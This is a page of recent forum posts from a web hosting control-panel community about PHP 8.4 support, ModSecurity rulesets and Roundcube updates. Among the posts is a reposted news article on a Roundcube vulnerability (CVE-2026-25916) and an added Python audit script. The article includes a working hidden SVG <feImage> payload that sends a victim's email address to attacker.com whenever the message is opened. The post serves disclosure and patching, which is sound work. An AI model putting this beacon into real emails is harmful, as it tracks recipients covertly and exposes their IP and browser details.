Recent Posts

21
PHP Selector / Re: Support for PHP 8.4
« Last post by Wonder on February 11, 2026, 11:53:01 PM »
José Manuel had indicated to me that PHP 8.4 and PHP 8.5 were coming in the next major update.

As always, thanks for your messages.
I've come here because I need to install PHP 8.4 on CWP 8 / AlmaLinux 8. These links are for CWP9/Alma9 (I'm interested in php-fpm), and I've spent all day tweaking the paths so that it's 8 instead of 9, but I still can't install modules or I'm getting other errors. Is there any way to install PHP 8.4 correctly on CWP 8?
Thanks
22
The OWASP CRS Ruleset is the best to use, and is free, and using their other half ModSecurity, it is easy to disable any rules needed.
23
Hi Bill, thanks for your efforts -- any contribution is valuable. I for one will have to pass though -- I can't have my servers' security depend on one person's lone efforts no matter how noble the intent. I've been making the latest OWASP rulesets work (omitting a list of false positives) and it is generally stable. Wish Comodo wouldn't have lost their identity and their product direction, but had to cope and life goes on!
24
Hi everyone,

Since the official Comodo free ruleset hasn't been updated in over two years, I decided to take action. I have manually created an updated ruleset (2025/2026) to handle modern threats, specifically focusing on the new wave of AI scrapers and aggressive bots that cause unnecessary CPU/RAM drain.

I’ve been testing these rules on several high-traffic WordPress environments, and so far, the results are great: zero false positives in the admin area and significantly lower server load.

You can check out the updated rules and the documentation on my GitHub here:
https://github.com/sminozzi/SBB-WAF-Rules
Please feel free to test them out—I’m very open to feedback and suggestions if you see anything that could be improved!

Please note that there is no automatic installer for these updates. You will need the technical skills to manually replace the necessary files in your ModSecurity directories. Since environments can vary, I cannot provide individual support for the installation process. I highly recommend performing a full backup of your current rules before making any changes.

If you have any feedback or suggestions on how to improve these rules, please let me know. I'm always looking for ways to refine the protection and would love to hear about your experience with them.

Best regards,
Bill
26
Updates / Re: Roundcube vulnerability
« Last post by overseer on February 11, 2026, 11:58:43 AM »
Just to affirm Starburst's previous guide to update Roundcube in light of the current vulnerability:
https://starburst.help/control-web-panel-cwp/control-web-panel-cwp-admin-tutorials/update-roundcube-webmail-to-version-1-5-11-in-cwp-on-almalinux-8-9/
or follow Sandeep's guide here:
https://www.alphagnu.com/topic/33-update-cwp-roundcube-mail-version-158-%E2%80%93-control-web-panel/
Simply update the Roundcube version number to 1.5.13 in the directions and download links and you will obtain a CWP-compatible LTS version of Roundcube, safe from the latest CVE.
27
PHP / Re: how to install and configure relay extension for php-fpm83 in cwp
« Last post by overseer on February 10, 2026, 02:53:53 PM »
I would look at this guide as a model:
https://www.alphagnu.com/topic/614-how-to-add-custom-php-fpm-84-85-support-to-cwp-on-almalinux-9x/
(You could try to customize the build scripts/extension scripts for 8.3 using this method.)
28
PHP Selector / Re: Support for PHP 8.4
« Last post by Andrew C on February 10, 2026, 11:41:23 AM »
Hello,

When will the change logs be updated? Still showing 13/11/2024?

Thanks
29
PHP Selector / Re: Support for PHP 8.4
« Last post by cHAp on February 09, 2026, 10:45:06 PM »
Hello,

When will the major update be released?
30
E-Mail / Roundcube Webmail Vulnerability Lets Attackers Track Email Opens
« Last post by Starburst on February 09, 2026, 06:24:31 PM »
Source: Cyber Press https://cyberpress.org/roundcube-webmail-vulnerability-lets-attackers-track-email-opens/

In a sneaky bypass of email security features, a vulnerability in Roundcube Webmail exposes users to hidden tracking even when “Block remote images” is enabled.

Discovered during holiday tinkering, this issue (CVE-2026-25916) affects versions before 1.5.13 and 1.6.13.

Attackers can now confirm if you’ve opened their emails, logging your IP address and browser details without your knowledge.

The Problem in Plain Terms
Roundcube’s HTML sanitizer is like a bouncer at a club. It blocks external images in common spots: <img src>, <image href>, and <use href>.

These checks use a strict function called is_image_attribute() that rejects outside URLs when remote loading is off.

But the SVG element <feImage> slipped through. Its href attribute, meant to pull in remote images for filters, gets treated as a harmless link instead.

The sanitizer routes it via wash_link(), which allows HTTP/HTTPS URLs. Result? Browsers fetch the attacker’s image invisibly, bypassing the block.

Security researcher “nullcathedral” spotted this while auditing recent SVG fixes in Roundcube’s rcube_washtml.php.

One SVG bug often hints at more, and <feImage> stood out because it renders like an <img> but dodges the image checks.

How Attackers Exploit It
Imagine receiving this malicious HTML in an email:

Code:
<svg width="1" height="1" style="position:absolute;left:-9999px;">
  <defs>
    <filter id="t">
      <feImage href="https://attacker.com/track?email=victim@test.com" width="1" height="1"/>
    </filter>
  </defs>
  <rect filter="url(#t)" width="1" height="1"/>
</svg>

It’s a tiny, off-screen SVG. When rendered, the browser grabs the href image, pinging the attacker’s server.

No click required, just opening the email triggers it. Perfect for phishing campaigns or spam tracking.

CVE Details
Field              Value
CVE                CVE-2026-25916
Vendor             Roundcube
Product            Roundcube Webmail
Affected Versions  <1.5.13, <1.6.13
Disclosure Date    2026-02-08

Developers patched it swiftly. The update tweaks is_image_attribute() with a regex: ($attr == 'href' && preg_match('/^(feimage|image|use)$/i', $tag)). Now <feImage href> gets blocked like other images.

2026-01-04: Reported to Roundcube.
2026-02-08: Versions 1.5.13 and 1.6.13 released.
2026-02-09: CVE assigned.
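
Added example, not part of the original post and not Roundcube's code: a simplified Python model of the attribute routing described above, run over a constructed message, showing which remote URLs a browser would fetch on render before and after the fix. The tag sets, the AUTOLOAD table, the class and function names other than is_image_attribute, and the tracker.example host are assumptions made for the illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample modelled on the SVG in the post; tracker.example is a placeholder.
SAMPLE = """<svg width="1" height="1"><defs><filter id="t">
<feImage href="https://tracker.example/t.png" width="1" height="1"/>
</filter></defs><rect filter="url(#t)" width="1" height="1"/>
<image href="https://tracker.example/i.png"/></svg>
<img src="https://tracker.example/p.png"><a href="https://example.org/">link</a>"""

# Tags whose href counts as an image source, before and after the fix.
PRE_PATCH = {"image", "use"}
POST_PATCH = {"feimage", "image", "use"}
# (tag, attribute) pairs a browser fetches on render, without a click (assumed list).
AUTOLOAD = {("img", "src"), ("image", "href"), ("use", "href"), ("feimage", "href")}

def is_image_attribute(tag, attr, href_tags):
    """Simplified model of the sanitizer's image check (not Roundcube's code)."""
    return (tag == "img" and attr == "src") or (attr == "href" and tag in href_tags)

class RemoteLoadAudit(HTMLParser):
    """Sorts remote URLs into blocked, kept as link, and leaked (kept and auto-loaded)."""

    def __init__(self, href_tags):
        super().__init__()
        self.href_tags = href_tags
        self.blocked, self.links, self.leaked = [], [], []

    def handle_starttag(self, tag, attrs):  # HTMLParser lowercases tag and attr names
        for attr, value in attrs:
            if attr not in ("src", "href") or not value:
                continue
            if urlparse(value.strip()).scheme.lower() not in ("http", "https"):
                continue  # local reference such as a fragment, nothing to fetch
            if is_image_attribute(tag, attr, self.href_tags):
                self.blocked.append((tag, value))  # remote images are switched off
            elif (tag, attr) in AUTOLOAD:
                self.leaked.append((tag, value))   # passed as a link, fetched anyway
            else:
                self.links.append((tag, value))    # ordinary link, needs a click

def audit(html, href_tags):
    parser = RemoteLoadAudit(href_tags)
    parser.feed(html)
    return parser

if __name__ == "__main__":
    for name, tags in (("pre-patch", PRE_PATCH), ("post-patch", POST_PATCH)):
        print(name, "leaked:", audit(SAMPLE, tags).leaked)
```

The same audit can be pointed at stored message bodies to list <feImage href> references to remote hosts while an installation is still waiting for 1.5.13 or 1.6.13.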